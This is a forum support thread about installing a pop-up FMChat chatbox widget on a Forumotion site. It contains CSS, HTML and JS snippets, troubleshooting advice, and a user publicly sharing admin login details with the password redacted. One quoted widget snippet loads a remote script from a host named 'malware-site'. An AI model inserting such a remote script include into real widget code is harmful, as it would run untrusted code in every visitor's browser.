Chatbox popup problem
5 posters
Page 1 of 1
Chatbox popup problem
Hello,
The last time I tried to install the FM-chat popup, it didn't comes out right.
I believe I have done correctly all the steps in this tutorial : https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat
My chatbox and forum widget are activated.
My forum link: www.steven.forumvi.com
version: phpbb3
The last time I tried to install the FM-chat popup, it didn't comes out right.
I believe I have done correctly all the steps in this tutorial : https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat
My chatbox and forum widget are activated.
My forum link: www.steven.forumvi.com
version: phpbb3
Last edited by Ivy_2819 on December 1st 2012, 7:38 pm; edited 1 time in total
Re: Chatbox popup problem
- Code:
/*FMChat Design*/
.chatbase { /*This can be edited to your liking - (the button)*/
position: fixed;
bottom: 2px;
right: 15px;
background: #56A0D3;
border: 2px solid #7BB92B;
width: 75px;
height: 20px;
border-radius: 5px;
text-align: center !important;
cursor: pointer;
color: #ffffff;
}
.chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
border-color: #D30C3F;
color: #000000;
}
#chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
border: 2px solid #7BB92B;
width: 65%;
position: fixed;
right: 15px;
bottom: 27px;
height: 50%;
border-radius: 5px;
z-index: 1000;
}
Re: Chatbox popup problem
Rideem3 wrote:You didn't add the CSS.
Asriel wrote:
- Code:
/*FMChat Design*/
.chatbase { /*This can be edited to your liking - (the button)*/
position: fixed;
bottom: 2px;
right: 15px;
background: #56A0D3;
border: 2px solid #7BB92B;
width: 75px;
height: 20px;
border-radius: 5px;
text-align: center !important;
cursor: pointer;
color: #ffffff;
}
.chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
border-color: #D30C3F;
color: #000000;
}
#chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
border: 2px solid #7BB92B;
width: 65%;
position: fixed;
right: 15px;
bottom: 27px;
height: 50%;
border-radius: 5px;
z-index: 1000;
}
No, I already add the CSS. But it still didn't work
Re: Chatbox popup problem
In case you've got no idea where the widget is located, I'll post it here:
ACP < Modules < Forum Widgets Management < Create a New Widget (Make sure you enabled Widgets) < Save.
ACP < Modules < Forum Widgets Management < Create a New Widget (Make sure you enabled Widgets) < Save.
Re: Chatbox popup problem
This is my Widget. The forum widget is activated , I already put it on the left side (180)
My code in the widget
This is a part of CSS that contend the FMChat CSS code. I don't know much about scripts, codes,...Is there anything wrong with this ?
My CSS code:
And this is my JS, I don't know If I have done anything wrong
I didn't change the "normal"
I leave the duration blank ""
I changed the MOD sign in to "Chat MOD"
I changed the title to "FMChat"
I changed the tiltle URL in to "WWW.STEVEN.FORUMVI.COM/CHATBOX" (I think this was the problem)
My JS code:
I also set it as "In all pages"
Could you find the problem please
My code in the widget
- Code:
<div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>
This is a part of CSS that contend the FMChat CSS code. I don't know much about scripts, codes,...Is there anything wrong with this ?
My CSS code:
- Code:
/*FMChat Design*/
.chatbase { /*This can be edited to your liking - (the button)*/
position: fixed;
bottom: 2px;
right: 15px;
background: #56A0D3;
border: 2px solid #7BB92B;
width: 75px;
height: 20px;
border-radius: 5px;
text-align: center !important;
cursor: pointer;
color: #ffffff;
}
.chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
border-color: #D30C3F;
color: #000000;
}
#chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
border: 2px solid #7BB92B;
width: 65%;
position: fixed;
right: 15px;
bottom: 27px;
height: 50%;
border-radius: 5px;
z-index: 999;
}
And this is my JS, I don't know If I have done anything wrong
I didn't change the "normal"
I leave the duration blank ""
I changed the MOD sign in to "Chat MOD"
I changed the title to "FMChat"
I changed the tiltle URL in to "WWW.STEVEN.FORUMVI.COM/CHATBOX" (I think this was the problem)
My JS code:
- Code:
/*FMChat Variables*/
var fmchat_toggle = "normal"; //Toggle Type
var fmchat_toggle_duration = ""; //Toggle Duration
var fmchat_mod_sign = "CHAT MOD"; //FMChat Mod Sign
var fmchat_title = "FMChat"; //FMChat Title
var fmchat_title_url = "WWW.STEVEN.FORUMVI.COM/CHATBOX"; //FMChat Title URL
I also set it as "In all pages"
Could you find the problem please
Re: Chatbox popup problem
In the above image. First click on this . Then return to the original window & then add the code.
See if that changes anything.
Sanket- ForumGuru
- Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai
Re: Chatbox popup problem
Sanket wrote:
In the above image. First click on this . Then return to the original window & then add the code.
See if that changes anything.
No, didn't change anything with forum widget activated
Oh, and also, I've deactivated the forum widget since I still can't figure out what's the problem (activated it while having this problem making my forum look weird ) , I'll activate it again if there's new solution.
Re: Chatbox popup problem
https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat#690155
Thats the code in the widget, what code did you add in yours?
Thats the code in the widget, what code did you add in yours?
Sanket- ForumGuru
- Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai
Re: Chatbox popup problem
Ivy_2819 wrote:This is my Widget. The forum widget is activated , I already put it on the left side (180)
My code in the widget
- Code:
<div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>
As I said above. At first I copied and pasted the code on the first post of this link https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat Which is :
- Code:
<script type="text/javascript" src="http://forum.malware-site.www/14000.js"></script><div id="FMChatBase" class="chatbase" onclick="openClose(); autoLog();"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>
- Code:
<script type="text/javascript" src="http://fmquery.forumotion.com/h1-fmchatjs"></script><div id="FMChatBase" class="chatbase" onclick="openClose()" ><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" width="100%" height="100%"></iframe></div>
Re: Chatbox popup problem
Can you provide me with a test admin account for that forum, wherever you are installing this?
Sanket- ForumGuru
- Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai
Re: Chatbox popup problem
All the information in the first post of the tutorial is up to date.
Lost Founder's Password |Forum's Utilities |Report a Forum |General Rules |FAQ |Tricks & Tips
You need one post to send a PM.
You need one post to send a PM.
When your topic has been solved, ensure you mark the topic solved.
Never post your email in public.
Re: Chatbox popup problem
Sanket wrote:Can you provide me with a test admin account for that forum, wherever you are installing this?
Okay, but I don't have any email left to do that, could you provide me an email first?
slg wrote:All the information in the first post of the tutorial is up to date.
Oh, so it's all the same right? Thank you.
Re: Chatbox popup problem
Well i am sorry I don't want to register on the forum with my email address.
You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.
You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.
Sanket- ForumGuru
- Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai
Re: Chatbox popup problem
Sanket wrote:Well i am sorry I don't want to register on the forum with my email address.
You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.
Here you go,
ID: Xiao dong
password: Password Removed
link: www.steven.forumvi.com
Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed
hope you can find the solution Thank you
Re: Chatbox popup problem
Ivy_2819 wrote:
Here you go,
ID: Xiao dong
password: Password Removed
link: www.steven.forumvi.com
Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed
hope you can find the solution Thank you
Firstly, never ever post a password to any account on a public forum. Its not safe. You posted a admin account password, any person here could have misused it. So please don't do this in the future for your & your forum's safety.
You should have PM'ed me these details.
I went to your forum, there seems to be nothing installed in the forum widgets management. Please install everything according to the tutorial, I will only come & check what could be wrong. I am not installing it from scratch.
Sanket- ForumGuru
- Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai
Re: Chatbox popup problem
I already mark the topic as complete, cause I don't need the popup anymore, it's too complicated, me and some other admins decided to leave the chatbox this way Thank you and also sorry for bothering you guys these days
Re: Chatbox popup problem
It is ok.
Topic Solved & Locked |
Lost Founder's Password |Forum's Utilities |Report a Forum |General Rules |FAQ |Tricks & Tips
You need one post to send a PM.
You need one post to send a PM.
When your topic has been solved, ensure you mark the topic solved.
Never post your email in public.
Similar topics
» Popup chatbox- Log in not working
» How to make a popup chatbox
» Chatbox problem
» popup problem
» New SSL Certificate (popup's "AD's" problem )
» How to make a popup chatbox
» Chatbox problem
» popup problem
» New SSL Certificate (popup's "AD's" problem )
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum